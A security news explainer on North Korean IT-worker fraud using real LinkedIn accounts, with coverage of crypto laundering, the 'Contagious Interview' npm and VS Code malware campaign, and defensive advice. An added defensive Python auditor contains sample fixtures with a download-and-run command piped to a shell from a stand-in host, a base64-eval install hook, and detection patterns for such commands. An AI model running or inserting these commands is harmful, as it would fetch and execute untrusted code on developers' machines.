The new North Korean work scam that uses stolen identities and real LinkedIn accounts to infiltrate


In recent months it has become clear that an old form of labour fraud has escalated in sophistication and scope: groups linked to the Democratic People's Republic of Korea have moved from impersonating identities to fill in application forms to presenting themselves in selection processes with real LinkedIn accounts belonging to the people they are impersonating. According to posts by the Security Alliance on X, the profiles used often have verified and distinctive corporate email addresses which, on the surface, make the fraudulent applications look entirely legitimate (source). This is not just about stealing a résumé: the attackers seek to establish presence and trust inside companies, which lets them move more freely once they gain access.

This phenomenon is part of a persistent operation, documented by various actors in the sector, in which supposed "remote workers" are hired by Western companies using stolen or fabricated identities. Researchers and security companies have tracked this activity for years and given it different names (Jasper Sleet, PurpleDelta and Wagemole, among others), but the pattern is consistent. The objective is twofold: to extract economic value and, in parallel, to obtain access to sensitive information for espionage or extortion. Specialised firms have described the programme as a stable source of income for the North Korean dictatorship, as well as a vector for obtaining administrative privileges within critical software infrastructure (KELA analysis) and (Silent Push investigation).


At the financial level, the final destination of the wages received by these actors has also been studied. Blockchain analysis reports show how the proceeds move across chains, are swapped through different tokens and cross decentralised bridges and exchanges to complicate tracing and break the link between the source and destination of the funds (Chainalysis). The combination of stolen identities, corporate access and advanced crypto-asset mixing techniques creates a chain that is hard to cut for those who investigate or try to block the flow of money.

In parallel to the fake recruitment, social engineering campaigns have proliferated that are designed specifically to get the victim to execute malicious code during the selection process. In the campaign known as "Contagious Interview", the attackers lure candidates on LinkedIn with job offers and, during apparently normal interviews, request technical tests that involve cloning a GitHub repository and running commands. In some attacks the candidates were asked to install npm packages containing a malicious payload, which allowed the authors to run malware on the victims' machines; other variants have used Visual Studio Code tasks that run JavaScript disguised as web sources, finally deploying malware families such as BeaverTail or InvisibleFerret to steal credentials and cryptocurrency (technical explanation by Fireblocks) and (Abstract Security follow-up).

The techniques are not limited to simple malicious packages: some attacks have been documented using a method called EtherHiding, which uses smart contracts and the blockchain to host and retrieve command-and-control infrastructure, further complicating the takedown of malicious servers by dispersing them across public and immutable networks (technical detail). Another campaign tracked by researchers deployed a modular remote access Trojan called Koalemos through infected npm packages; this RAT performs system fingerprinting, maintains beaconing loops with external servers and supports multiple commands to operate on files, transfer data and run arbitrary code (Panther analysis). The favourite vector of these groups is often legitimate software or the developer's toolchain (repositories, packages and IDE tasks), because it is the most direct way to run code in trusted environments.

The security ecosystem's response has also evolved. Intelligence companies and cybersecurity firms point out that North Korean groups such as Labyrinth Chollima have broken their operations down into units with differentiated objectives and methods: some focus on the systematic theft of crypto-assets in small volumes, others go for bigger hits against specific targets with more sophisticated tools, and a third maintains profiles dedicated to espionage using rootkits and advanced persistence techniques. Although they operate under different names, they share infrastructure and tools, which suggests centralised coordination that optimises resources and knowledge across the different cells (CrowdStrike report).

The implications for businesses and professionals are clear and worrying. At the individual level, a compromised or impersonated LinkedIn account can be used to apply for dozens of vacancies and build a legitimate-looking "employment" trail that, in the eyes of an insufficiently cautious recruiter, raises no suspicion. At the corporate level, a remote developer with access to repositories or continuous integration environments can become an entry point for planting backdoors, exfiltrating source code and moving laterally. The Norwegian security police (PST) even warned of cases in which companies in Norway hired what were likely North Korean workers in remote positions, whose salaries could finance the regime's weapons programmes (PST statement).


The good news is that many of the most effective measures against these social engineering tactics are simple, verifiable processes: asking the candidate to confirm a corporate email address, requesting a direct interaction on the professional network to check ownership of the account, requiring a video call with corporate identification, or implementing technical steps that prevent unknown code from being executed directly on machines with access to sensitive resources. From a technical point of view, it is advisable to isolate evaluation environments, sandbox any external package, audit dependencies, protect CI/CD pipelines and apply strict least-privilege policies in repositories. It is also worth monitoring transfers of digital assets and unusual withdrawal patterns to detect possible illicit flows early (Chainalysis recommendations).
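As an added example (not code from the article or from any of the firms it cites), the following Python check covers the two artefacts the Contagious Interview campaign described above abuses, npm lifecycle scripts and Visual Studio Code tasks, and applies the sandboxing advice in this paragraph by inspecting a cloned "technical test" repository before anything in it is executed. The sample package.json and tasks.json, the URL and the regex patterns are constructed assumptions.

```python
import json
import re

# Constructed samples (not from the article): the kind of "technical test" repository a
# candidate is handed. The checks below inspect the files before anything is executed.
SAMPLE_PACKAGE_JSON = json.dumps({"name": "coding-challenge", "scripts": {
    "test": "jest",
    "postinstall": "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())\"",
}})
SAMPLE_TASKS_JSON = json.dumps({"version": "2.0.0", "tasks": [{
    "label": "setup", "type": "shell",
    "command": "curl -s https://example.invalid/s.sh | sh",
    "runOptions": {"runOn": "folderOpen"},
}]})

# npm executes these hooks during `npm install` unless --ignore-scripts is set.
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Patterns that are rarely legitimate inside a take-home exercise (assumed heuristics).
SUSPICIOUS = re.compile(
    r"base64|eval\(|node -e|\b(curl|wget)\b.*\|\s*(ba)?sh\b|Invoke-WebRequest", re.I)

def audit_package_json(text: str) -> list[str]:
    """Flag install-time hooks (run without explicit consent) and suspicious script bodies."""
    findings = []
    for name, body in json.loads(text).get("scripts", {}).items():
        if name in NPM_LIFECYCLE_HOOKS:
            findings.append(f"package.json: lifecycle hook '{name}' runs on npm install")
        if SUSPICIOUS.search(body):
            findings.append(f"package.json: suspicious content in script '{name}': {body}")
    return findings

def audit_vscode_tasks(text: str) -> list[str]:
    """Flag tasks VS Code may start when the folder is opened, and download-and-run commands."""
    findings = []
    for task in json.loads(text).get("tasks", []):
        label = task.get("label", "<unnamed>")
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append(f"tasks.json: task '{label}' is configured to run on folder open")
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        if SUSPICIOUS.search(cmd):
            findings.append(f"tasks.json: suspicious command in task '{label}': {cmd}")
    return findings

def audit_repo(package_json: str, tasks_json: str) -> list[str]:
    """Combined report for the two files this campaign abuses; an empty list means nothing flagged."""
    return audit_package_json(package_json) + audit_vscode_tasks(tasks_json)

if __name__ == "__main__":
    for finding in audit_repo(SAMPLE_PACKAGE_JSON, SAMPLE_TASKS_JSON):
        print("FINDING:", finding)
```

Run it on the cloned repository before `npm install` or before opening the folder in the IDE; whatever it reports, installing with `npm install --ignore-scripts` inside an isolated environment keeps install hooks from running on a machine that holds credentials.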

For those who suspect that their identity has been usurped in selection processes, a rapid and public reaction is often effective: posting a warning on social profiles, publishing official contact channels and explaining how to verify their identity (for example, by indicating a corporate email address or a known authentication method). On the business side, manual verification remains valuable: asking the person to connect from their real LinkedIn account, to reply from a verified email address and to hold a brief real-time interaction with an internal manager can filter out many of the impersonations. The combination of technical controls and common sense in human resources and development processes is the best defence against such attacks.

Finally, it is important to remember that this phenomenon is not a rare anomaly: it is a logical evolution for actors who combine social engineering, knowledge of the development ecosystem and advanced financial techniques. The coexistence of campaigns such as Contagious Interview, malicious package supply operations and group activity attributed to Lazarus or Labyrinth Chollima shows that the threat is multidimensional and persistent. Staying informed, applying rigorous checks in recruitment processes and tightening technical defences around endpoints and pipelines are indispensable steps to reduce the attack surface and protect both employees and organisations from these increasingly polished tactics.
